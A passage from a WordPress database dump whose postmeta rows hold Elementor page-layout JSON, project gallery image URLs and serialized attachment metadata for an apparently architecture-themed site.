projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\",\"hide_desktop\":\"hidden-desktop\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a825c79\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7fa1a66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"296f069\",\"elType\":\"widget\",\"settings\":{\"gallery\":[{\"id\":4812,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-1.jpg\"},{\"id\":4813,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-2.jpg\"},{\"id\":4814,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-3.jpg\"},{\"id\":4815,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-4.jpg\"},{\"id\":4816,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-5.jpg\"},{\"id\":4817,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-6.jpg\"},{\"id\":4818,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/residential-7.jpg\"}],\"galleries\":[{\"gallery_title\":\"New Gallery\",\"_id\":\"c010aae\"}],\"columns\":3,\"aspect_ratio\":\"9:16\",\"thumbnail_image_size\":\"2048x2048\",\"show_all_galleries_label\":\"All\"},\"elements\":[],\"widgetType\":\"gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(3524,4821,'_elementor_page_assets','a:0:{}'),(3525,4821,'_elementor_css','a:6:{s:4:\"time\";i:1668397356;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3526,560,'_elementor_pro_version','3.8.1'),(3528,4822,'_wp_page_template','elementor_header_footer'),(3529,4822,'_elementor_edit_mode','builder'),(3530,4822,'_elementor_template_type','wp-page'),(3531,4822,'_elementor_version','3.6.6'),(3532,4822,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"}],\"isInner\":false}],\"isInner\":false}]'),(3533,4822,'_elementor_page_assets','a:0:{}'),(3534,4822,'_elementor_css','a:6:{s:4:\"time\";i:1668398075;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3535,4823,'_wp_page_template','elementor_header_footer'),(3536,4823,'_elementor_edit_mode','builder'),(3537,4823,'_elementor_template_type','wp-page'),(3538,4823,'_elementor_version','3.6.6'),(3539,4823,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"}],\"isInner\":false}],\"isInner\":false}]'),(3540,4823,'_elementor_page_assets','a:0:{}'),(3541,4823,'_elementor_css','a:6:{s:4:\"time\";i:1668398075;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3542,4824,'_wp_page_template','elementor_header_footer'),(3543,4824,'_elementor_edit_mode','builder'),(3544,4824,'_elementor_template_type','wp-page'),(3545,4824,'_elementor_version','3.6.6'),(3546,4824,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\",\"hide_desktop\":\"hidden-desktop\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"}],\"isInner\":false}],\"isInner\":false}]'),(3547,4824,'_elementor_page_assets','a:0:{}'),(3548,4824,'_elementor_css','a:6:{s:4:\"time\";i:1668398075;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3549,4681,'_elementor_pro_version','3.8.1'),(3550,4825,'_wp_attached_file','2023/05/commercial-1.jpg'),(3551,4825,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:895;s:6:\"height\";i:781;s:4:\"file\";s:24:\"2023/05/commercial-1.jpg\";s:8:\"filesize\";i:87588;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"commercial-1-300x262.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:262;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15971;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"commercial-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5761;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"commercial-1-768x670.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:670;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:76610;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:24:\"commercial-1-768x660.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:76120;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:24:\"commercial-1-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31128;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:24:\"commercial-1-378x781.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:781;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42896;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:24:\"commercial-1-895x473.jpg\";s:5:\"width\";i:895;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:82797;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3552,4826,'_wp_attached_file','2023/05/commercial-2.jpg'),(3553,4826,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:970;s:6:\"height\";i:910;s:4:\"file\";s:24:\"2023/05/commercial-2.jpg\";s:8:\"filesize\";i:114553;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"commercial-2-300x281.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:281;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17948;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"commercial-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6247;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"commercial-2-768x720.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:720;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:86241;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:24:\"commercial-2-768x660.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:81946;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:24:\"commercial-2-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32029;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:24:\"commercial-2-378x824.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:824;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47806;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:24:\"commercial-2-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:78736;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3554,4827,'_wp_attached_file','2023/05/commercial-3.jpg'),(3555,4827,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:961;s:6:\"height\";i:1000;s:4:\"file\";s:24:\"2023/05/commercial-3.jpg\";s:8:\"filesize\";i:166192;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"commercial-3-288x300.jpg\";s:5:\"width\";i:288;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22389;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"commercial-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7270;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"commercial-3-768x799.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:799;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:124386;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:24:\"commercial-3-768x660.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:106940;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:24:\"commercial-3-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:41741;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:24:\"commercial-3-378x824.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:824;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:60491;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:24:\"commercial-3-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:100469;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3556,4828,'_wp_page_template','elementor_header_footer'),(3557,4828,'_elementor_edit_mode','builder'),(3558,4828,'_elementor_template_type','wp-page'),(3559,4828,'_elementor_version','3.8.1'),(3560,4828,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\",\"hide_desktop\":\"hidden-desktop\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"}],\"isInner\":false}],\"isInner\":false}]'),(3561,4828,'_elementor_page_assets','a:0:{}'),(3562,4828,'_elementor_pro_version','3.8.1'),(3563,4829,'_wp_page_template','elementor_header_footer'),(3564,4829,'_elementor_edit_mode','builder'),(3565,4829,'_elementor_template_type','wp-page'),(3566,4829,'_elementor_version','3.8.1'),(3567,4829,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\",\"hide_desktop\":\"hidden-desktop\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"}],\"isInner\":false}],\"isInner\":false}]'),(3568,4829,'_elementor_page_assets','a:0:{}'),(3569,4829,'_elementor_pro_version','3.8.1'),(3570,4830,'_wp_page_template','elementor_header_footer'),(3571,4830,'_elementor_edit_mode','builder'),(3572,4830,'_elementor_template_type','wp-page'),(3573,4830,'_elementor_version','3.8.1'),(3574,4830,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\",\"hide_desktop\":\"hidden-desktop\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b46d948\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d86197\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fe2cde6\",\"elType\":\"widget\",\"settings\":{\"gallery\":[{\"id\":4825,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/commercial-1.jpg\"},{\"id\":4826,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/commercial-2.jpg\"},{\"id\":4827,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/commercial-3.jpg\"}],\"galleries\":[{\"gallery_title\":\"New Gallery\",\"_id\":\"0a9343c\"}],\"columns\":3,\"aspect_ratio\":\"9:16\",\"thumbnail_image_size\":\"2048x2048\",\"show_all_galleries_label\":\"All\"},\"elements\":[],\"widgetType\":\"gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(3575,4830,'_elementor_page_assets','a:0:{}'),(3576,4830,'_elementor_pro_version','3.8.1'),(3577,4831,'_wp_page_template','elementor_header_footer'),(3578,4831,'_elementor_edit_mode','builder'),(3579,4831,'_elementor_template_type','wp-page'),(3580,4831,'_elementor_version','3.8.1'),(3581,4831,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\",\"hide_desktop\":\"hidden-desktop\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b46d948\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d86197\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fe2cde6\",\"elType\":\"widget\",\"settings\":{\"gallery\":[{\"id\":4825,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/commercial-1.jpg\"},{\"id\":4826,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/commercial-2.jpg\"},{\"id\":4827,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/commercial-3.jpg\"}],\"galleries\":[{\"gallery_title\":\"New Gallery\",\"_id\":\"0a9343c\"}],\"columns\":3,\"aspect_ratio\":\"9:16\",\"thumbnail_image_size\":\"2048x2048\",\"show_all_galleries_label\":\"All\"},\"elements\":[],\"widgetType\":\"gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(3582,4831,'_elementor_page_assets','a:0:{}'),(3583,4831,'_elementor_pro_version','3.8.1'),(3584,4832,'_wp_page_template','elementor_header_footer'),(3585,4832,'_elementor_edit_mode','builder'),(3586,4832,'_elementor_template_type','wp-page'),(3587,4832,'_elementor_version','3.8.1'),(3588,4832,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\",\"hide_desktop\":\"hidden-desktop\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b46d948\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d86197\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fe2cde6\",\"elType\":\"widget\",\"settings\":{\"gallery\":[{\"id\":4825,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/commercial-1.jpg\"},{\"id\":4826,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/commercial-2.jpg\"},{\"id\":4827,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/commercial-3.jpg\"}],\"galleries\":[{\"gallery_title\":\"New 